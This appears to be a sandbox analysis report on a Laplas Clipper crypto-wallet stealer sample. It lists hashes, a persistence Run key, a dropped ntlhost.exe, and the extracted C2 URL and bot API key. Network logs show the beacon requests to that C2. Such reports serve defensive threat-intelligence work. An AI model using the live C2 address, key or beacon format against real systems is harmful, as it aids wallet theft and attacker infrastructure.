Overview

overview

10

Static

static

3

f927d512c8...JC.exe

windows7-x64

10

f927d512c8...JC.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230831-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/09/2023, 19:51 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f927d512c8ea36edb283f9e8d5e02ab4ea25b4b143ea605284a3506cd00b8b57_JC.exe

  • Size

    10.0MB

  • MD5

    197bebce417f5ba6c178ee34037fbdea

  • SHA1

    d9dc871f8e61e590115bae9b0d842fae0f8f52b9

  • SHA256

    f927d512c8ea36edb283f9e8d5e02ab4ea25b4b143ea605284a3506cd00b8b57

  • SHA512

    8cf7bde02dc86518d60f3836e86d3def9b9fcaf4242eaefccc6eaf2ffe61e7eaebc5d2ca114fc11169854726cce125e7f71cdb92214c1e248b4006afa2b223ad

  • SSDEEP

    49152:4EjwvlIKv05z+UERnIcYmWjc3Cdhu5E9UFiqeb0/B1Y4kIZxdez6LK+/BV6Cbfoq:OlhWzZ6hnEciqem

Score
10/10
laplasclipperpersistencestealer

Malware Config

Extracted

Family

laplas

C2

http://lpls.tuktuk.ug

Attributes
  • api_key

    a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

    stealerclipperlaplas
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f927d512c8ea36edb283f9e8d5e02ab4ea25b4b143ea605284a3506cd00b8b57_JC.exe
    "C:\Users\Admin\AppData\Local\Temp\f927d512c8ea36edb283f9e8d5e02ab4ea25b4b143ea605284a3506cd00b8b57_JC.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4412
    • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
      2⤵
      • Executes dropped EXE
      PID:1060

Network

  • flag-us
    DNS
    67.31.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    67.31.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    254.36.238.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    254.36.238.8.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    9.228.82.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    9.228.82.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    41.110.16.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    41.110.16.96.in-addr.arpa
    IN PTR
    Response
    41.110.16.96.in-addr.arpa
    IN PTR
    a96-16-110-41deploystaticakamaitechnologiescom
  • flag-us
    DNS
    57.169.31.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    57.169.31.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    lpls.tuktuk.ug
    ntlhost.exe
    Remote address:
    8.8.8.8:53
    Request
    lpls.tuktuk.ug
    IN A
    Response
    lpls.tuktuk.ug
    IN A
    95.214.27.254
  • flag-us
    GET
    http://lpls.tuktuk.ug/bot/regex
    ntlhost.exe
    Remote address:
    95.214.27.254:80
    Request
    GET /bot/regex HTTP/1.1
    Host: lpls.tuktuk.ug
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.17.10 (Ubuntu)
    Date: Tue, 05 Sep 2023 19:51:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Content-Encoding: gzip
  • flag-us
    GET
    http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=VNIYNTNL\Admin
    ntlhost.exe
    Remote address:
    95.214.27.254:80
    Request
    GET /bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=VNIYNTNL\Admin HTTP/1.1
    Host: lpls.tuktuk.ug
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.17.10 (Ubuntu)
    Date: Tue, 05 Sep 2023 19:51:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Content-Encoding: gzip
  • flag-us
    GET
    http://lpls.tuktuk.ug/bot/regex
    ntlhost.exe
    Remote address:
    95.214.27.254:80
    Request
    GET /bot/regex HTTP/1.1
    Host: lpls.tuktuk.ug
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.17.10 (Ubuntu)
    Date: Tue, 05 Sep 2023 19:52:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Content-Encoding: gzip
  • flag-us
    GET
    http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=VNIYNTNL\Admin
    ntlhost.exe
    Remote address:
    95.214.27.254:80
    Request
    GET /bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=VNIYNTNL\Admin HTTP/1.1
    Host: lpls.tuktuk.ug
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.17.10 (Ubuntu)
    Date: Tue, 05 Sep 2023 19:52:31 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Content-Encoding: gzip
  • flag-us
    GET
    http://lpls.tuktuk.ug/bot/regex
    ntlhost.exe
    Remote address:
    95.214.27.254:80
    Request
    GET /bot/regex HTTP/1.1
    Host: lpls.tuktuk.ug
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.17.10 (Ubuntu)
    Date: Tue, 05 Sep 2023 19:53:31 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Content-Encoding: gzip
  • flag-us
    GET
    http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=VNIYNTNL\Admin
    ntlhost.exe
    Remote address:
    95.214.27.254:80
    Request
    GET /bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=VNIYNTNL\Admin HTTP/1.1
    Host: lpls.tuktuk.ug
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.17.10 (Ubuntu)
    Date: Tue, 05 Sep 2023 19:53:31 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Content-Encoding: gzip
  • flag-us
    DNS
    254.27.214.95.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    254.27.214.95.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    103.169.127.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    103.169.127.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    254.210.247.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    254.210.247.8.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    1.202.248.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.202.248.87.in-addr.arpa
    IN PTR
    Response
    1.202.248.87.in-addr.arpa
    IN PTR
    https-87-248-202-1amsllnwnet
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    26.73.42.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    26.73.42.20.in-addr.arpa
    IN PTR
    Response
  • 95.214.27.254:80
    http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=VNIYNTNL\Admin
    http
    ntlhost.exe
    1.5kB
     2.9kB
     14
    16

    HTTP Request

    GET http://lpls.tuktuk.ug/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=VNIYNTNL\Admin

    HTTP Response

    200

    HTTP Request

    GET http://lpls.tuktuk.ug/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=VNIYNTNL\Admin

    HTTP Response

    200

    HTTP Request

    GET http://lpls.tuktuk.ug/bot/regex

    HTTP Response

    200

    HTTP Request

    GET http://lpls.tuktuk.ug/bot/online?key=a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde&guid=VNIYNTNL\Admin

    HTTP Response

    200
  • 8.8.8.8:53
    67.31.126.40.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    67.31.126.40.in-addr.arpa

  • 8.8.8.8:53
    254.36.238.8.in-addr.arpa
    dns
    71 B
     125 B
     1
    1

    DNS Request

    254.36.238.8.in-addr.arpa

  • 8.8.8.8:53
    9.228.82.20.in-addr.arpa
    dns
    70 B
     156 B
     1
    1

    DNS Request

    9.228.82.20.in-addr.arpa

  • 8.8.8.8:53
    41.110.16.96.in-addr.arpa
    dns
    71 B
     135 B
     1
    1

    DNS Request

    41.110.16.96.in-addr.arpa

  • 8.8.8.8:53
    57.169.31.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    57.169.31.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    lpls.tuktuk.ug
    dns
    ntlhost.exe
    60 B
     76 B
     1
    1

    DNS Request

    lpls.tuktuk.ug

    DNS Response

    95.214.27.254

  • 8.8.8.8:53
    254.27.214.95.in-addr.arpa
    dns
    72 B
     147 B
     1
    1

    DNS Request

    254.27.214.95.in-addr.arpa

  • 8.8.8.8:53
    103.169.127.40.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    103.169.127.40.in-addr.arpa

  • 8.8.8.8:53
    206.23.85.13.in-addr.arpa
    dns
    142 B
     145 B
     2
    1

    DNS Request

    206.23.85.13.in-addr.arpa

    DNS Request

    206.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    254.210.247.8.in-addr.arpa
    dns
    72 B
     126 B
     1
    1

    DNS Request

    254.210.247.8.in-addr.arpa

  • 8.8.8.8:53
    1.202.248.87.in-addr.arpa
    dns
    71 B
     116 B
     1
    1

    DNS Request

    1.202.248.87.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    11.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    26.73.42.20.in-addr.arpa
    dns
    70 B
     156 B
     1
    1

    DNS Request

    26.73.42.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
    Filesize

    720.0MB

    MD5

    29fa44cdeffc3c3b14d0e4fd203e0b1f

    SHA1

    f5c0f8d3f416a513303f83825ecd1151b97adce5

    SHA256

    5c2d102694bcf67bea0504a27d6983ca8baf44f0a5dd6a7ce7fbee9bd0be4be3

    SHA512

    cee9ccad50f31b0804bec519020b64de0830055ae9937b30c0140e34c4791cf1bb5e09421807afb8f9d11c6e485f330f3c0ed17b86e1cf7a23f0644ac2e2fcd4

    Download Submit

  • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
    Filesize

    720.0MB

    MD5

    29fa44cdeffc3c3b14d0e4fd203e0b1f

    SHA1

    f5c0f8d3f416a513303f83825ecd1151b97adce5

    SHA256

    5c2d102694bcf67bea0504a27d6983ca8baf44f0a5dd6a7ce7fbee9bd0be4be3

    SHA512

    cee9ccad50f31b0804bec519020b64de0830055ae9937b30c0140e34c4791cf1bb5e09421807afb8f9d11c6e485f330f3c0ed17b86e1cf7a23f0644ac2e2fcd4

    Download Submit

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.